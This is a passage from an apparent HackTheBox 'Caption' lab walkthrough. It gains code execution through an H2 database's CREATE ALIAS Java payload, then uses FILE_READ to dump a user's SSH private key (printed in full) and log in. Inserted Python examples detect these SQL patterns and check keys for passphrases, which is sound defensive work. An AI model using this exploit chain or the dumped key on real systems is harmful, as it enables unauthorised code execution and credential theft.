H2 Database


The target system is hosting a GitBucket instance on port 8080, and I was able to authenticate to it. The backend H2 database runs in the security context of the SA (System Administrator) user, which means that code execution can be obtained through an SQL query in the Database viewer section. Referring to an online resource:

Create Alias


CREATE ALIAS SYS_EXEC AS $$ String sys_exec(String cmd) throws java.io.IOException {
    // run cmd on the database host and return everything it writes to stdout
    java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A");
    return s.hasNext() ? s.next() : "";
}
$$;

Create Alias function, SYS_EXEC, with Java Payload

Using the newly created alias function, SYS_EXEC, to invoke system-wide code execution. The H2 instance is running as the margo user, who is a valid system user.
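The two database-side steps above (an inline-Java CREATE ALIAS followed by a call to the new alias, and later a FILE_READ of a path on the host) leave a distinctive footprint in any SQL statement log. The following is an added example of my own, not code from the writeup or from H2: it classifies statements with a small rule set, remembers which aliases were created with Java source so that later calls to them are flagged too, and runs over a constructed sample log whose "timestamp user statement" layout is an assumption of the example rather than H2's own trace format. FILE_WRITE, CSVREAD and CSVWRITE are included alongside FILE_READ because they give the same kind of host file access; the root cause to fix remains the application's connection running as SA with the console reachable.

```python
import re

# Statement patterns for the host-level capabilities used on this page
# (CREATE ALIAS with inline Java, FILE_READ) and their sibling built-ins.
RULES = [
    ("java-alias", re.compile(r"\bCREATE\s+(?:OR\s+REPLACE\s+)?ALIAS\b.*?\bAS\s+\$\$", re.I | re.S)),
    ("host-file-read", re.compile(r"\b(?:FILE_READ|CSVREAD)\s*\(", re.I)),
    ("host-file-write", re.compile(r"\b(?:FILE_WRITE|CSVWRITE)\s*\(", re.I)),
]

ALIAS_NAME = re.compile(
    r"\bCREATE\s+(?:OR\s+REPLACE\s+)?ALIAS\s+(?:IF\s+NOT\s+EXISTS\s+)?([\w.]+)", re.I
)

# Constructed audit-log layout (assumption): "<timestamp> <db user> <statement>".
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<user>\S+)\s+(?P<sql>.*)$")


def classify_statement(sql: str, known_aliases=()) -> list:
    """Return the names of every rule the statement trips; an empty list means benign."""
    hits = [name for name, pattern in RULES if pattern.search(sql)]
    # A call to an alias that was earlier defined from Java source is the execution step.
    for alias in known_aliases:
        if re.search(r"\b" + re.escape(alias) + r"\s*\(", sql, re.I):
            hits.append("alias-invocation")
            break
    return hits


def scan_audit_log(text: str) -> list:
    """Walk the log in order, tracking Java-backed aliases as they are created."""
    findings = []
    known_aliases = set()
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        sql = m.group("sql")
        hits = classify_statement(sql, known_aliases)
        if "java-alias" in hits:
            name = ALIAS_NAME.search(sql)
            if name:
                known_aliases.add(name.group(1))
        if hits:
            findings.append({"ts": m.group("ts"), "user": m.group("user"), "rules": hits, "sql": sql})
    return findings


# Constructed sample log: the benign lines are invented; the flagged ones mirror the page.
SAMPLE_LOG = """\
2024-09-15T02:40:01Z SA SELECT id, name FROM repository WHERE owner = 'root'
2024-09-15T02:41:12Z SA CREATE ALIAS SYS_EXEC AS $$ String sys_exec(String cmd) throws java.io.IOException { return ""; } $$;
2024-09-15T02:41:30Z SA SELECT SYS_EXEC('id') FROM DUAL;
2024-09-15T02:42:05Z SA SELECT CAST(FILE_READ('/home/margo/.ssh/id_ecdsa') AS VARCHAR) FROM DUAL;
2024-09-15T02:42:40Z SA UPDATE account SET last_login_date = CURRENT_TIMESTAMP WHERE user_name = 'root'
"""

if __name__ == "__main__":
    for finding in scan_audit_log(SAMPLE_LOG):
        print(finding["ts"], finding["user"], ",".join(finding["rules"]), "->", finding["sql"][:60])
```

Ordering matters for the alias rule: the scanner only knows SYS_EXEC is Java-backed because it saw the CREATE ALIAS first, so a log fed out of order (or a log that starts after the alias was created) would miss the invocation. In a real deployment that is the argument for also inventorying existing aliases in INFORMATION_SCHEMA rather than relying on the log alone.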

SSH Key


The margo user has an SSH key, id_ecdsa.


File Read


Using the built-in FILE_READ function, I can read the contents of a file, such as an SSH private key.

SELECT CAST(FILE_READ('/home/margo/.ssh/id_ecdsa') AS VARCHAR) FROM DUAL;

Reading the private SSH key of the margo user (the query returned 2122 characters); margo is a valid system user, and the user has a private SSH key

┌──(kali㉿kali)-[~/archive/htb/labs/caption]
└─$ echo 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 | xxd -r -p
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS1zaGEy
LW5pc3RwMjU2AAAACG5pc3RwMjU2AAAAQQRHZ/hR5G0xBWp98v9ehqdmyo0W8yMur/B9hvVQx2KT
9TqITIypmWPVevlc4K/R227w3cFFUmX8FCnWR3vCMaAHAAAAoA2IHw0NiB8NAAAAE2VjZHNhLXNo
YTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEdn+FHkbTEFan3y/16Gp2bKjRbzIy6v8H2G9VDH
YpP1OohMjKmZY9V6+Vzgr9HbbvDdwUVSZfwUKdZHe8IxoAcAAAAgA2xSng2cB5DM15QFYKpZxuF5
alZCche1BMJIOUuAs0YAAAAAAQIDBAUGBwg=
-----END OPENSSH PRIVATE KEY-----
 
┌──(kali㉿kali)-[~/archive/htb/labs/caption]
└─$ chmod 600 ./id_ecdsa.margo

Exfiltrating & decoding the private SSH key of the margo user
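What makes the recovered key usable straight away is visible in its first few decoded bytes: an openssh-key-v1 file stores the cipher and KDF names in clear before the key material, and the one read above carries "none" for both, i.e. no passphrase. The following is an added example of my own, not code from the writeup: it reverses the hex encoding of the query result (the same step as `xxd -r -p` above), then parses only that unencrypted header to report the key type and whether the private section is passphrase-protected. That is the check worth running over keys found at rest during an audit. The sample key is constructed inline with dummy zero bytes for the key material, so it is structurally valid but useless as a credential.

```python
import base64
import binascii
import struct

PEM_HEADER = "-----BEGIN OPENSSH PRIVATE KEY-----"
PEM_FOOTER = "-----END OPENSSH PRIVATE KEY-----"
AUTH_MAGIC = b"openssh-key-v1\x00"  # fixed prefix of the openssh-key-v1 format


def hex_to_text(hex_blob: str) -> str:
    """Undo the hex encoding of the query result, the same step as `xxd -r -p`."""
    return binascii.unhexlify("".join(hex_blob.split())).decode("utf-8")


def _ssh_string(data: bytes) -> bytes:
    """Encode an SSH 'string': 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def _read_ssh_string(buf: bytes, offset: int):
    (length,) = struct.unpack(">I", buf[offset:offset + 4])
    start = offset + 4
    return buf[start:start + length], start + length


def inspect_openssh_key(pem_text: str) -> dict:
    """Parse the unencrypted header of an OpenSSH private key and report whether
    the private section is protected by a passphrase (cipher != 'none')."""
    lines = [line.strip() for line in pem_text.strip().splitlines()]
    if not lines or lines[0] != PEM_HEADER or lines[-1] != PEM_FOOTER:
        raise ValueError("not an OpenSSH private key (PEM armour missing)")
    blob = base64.b64decode("".join(lines[1:-1]))
    if not blob.startswith(AUTH_MAGIC):
        raise ValueError("unexpected magic; not openssh-key-v1")
    off = len(AUTH_MAGIC)
    cipher, off = _read_ssh_string(blob, off)
    kdf, off = _read_ssh_string(blob, off)
    _kdf_options, off = _read_ssh_string(blob, off)
    (nkeys,) = struct.unpack(">I", blob[off:off + 4])
    off += 4
    pubkey_blob, off = _read_ssh_string(blob, off)
    key_type, _ = _read_ssh_string(pubkey_blob, 0)  # public key blob starts with its type
    return {
        "key_type": key_type.decode(),
        "cipher": cipher.decode(),
        "kdf": kdf.decode(),
        "nkeys": nkeys,
        "encrypted": cipher != b"none",
    }


def build_sample_key(encrypted: bool) -> str:
    """Construct a structurally valid openssh-key-v1 file for the example (assumption:
    dummy zero bytes stand in for the curve point and the private scalar)."""
    pubkey_blob = (_ssh_string(b"ecdsa-sha2-nistp256")
                   + _ssh_string(b"nistp256")
                   + _ssh_string(b"\x04" + b"\x00" * 64))
    if encrypted:
        cipher, kdf = b"aes256-ctr", b"bcrypt"
        kdf_options = _ssh_string(b"\x00" * 16) + struct.pack(">I", 16)  # salt, rounds
    else:
        cipher, kdf, kdf_options = b"none", b"none", b""
    private_section = b"\x00" * 64  # dummy; real files carry the private scalar and comment
    blob = (AUTH_MAGIC + _ssh_string(cipher) + _ssh_string(kdf) + _ssh_string(kdf_options)
            + struct.pack(">I", 1) + _ssh_string(pubkey_blob) + _ssh_string(private_section))
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"{PEM_HEADER}\n{body}\n{PEM_FOOTER}\n"


# Constructed stand-in for the hex string the H2 console returned on the page.
SAMPLE_HEX_RESULT = binascii.hexlify(build_sample_key(encrypted=False).encode()).decode()

if __name__ == "__main__":
    print(inspect_openssh_key(hex_to_text(SAMPLE_HEX_RESULT)))
```

The parser deliberately stops after the public key blob: everything needed to decide "is this key protected" sits before the private section, so no key material is ever decoded or touched. A key reporting `encrypted: False` on a shared or reachable host is the finding to raise.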

┌──(kali㉿kali)-[~/archive/htb/labs/caption]
└─$ ssh margo@$IP -i ./id_ecdsa.margo
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-119-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro
 
 System information as of Sun Sep 15 02:42:58 PM UTC 2024
 
  System load:  0.0               Processes:             233
  Usage of /:   69.1% of 8.76GB   Users logged in:       0
  Memory usage: 29%               IPv4 address for eth0: 10.129.226.125
  Swap usage:   0%
 
 
Expanded Security Maintenance for Applications is not enabled.
 
0 updates can be applied immediately.
 
3 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm
 
 
Last login: Tue Sep 10 12:33:42 2024 from 10.10.14.23
margo@caption:~$ whoami
margo
margo@caption:~$ hostname
caption
margo@caption:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:94:38:74 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.129.226.125/16 brd 10.129.255.255 scope global dynamic eth0
       valid_lft 3217sec preferred_lft 3217sec

Initial Foothold established to the target system as the margo user via SSH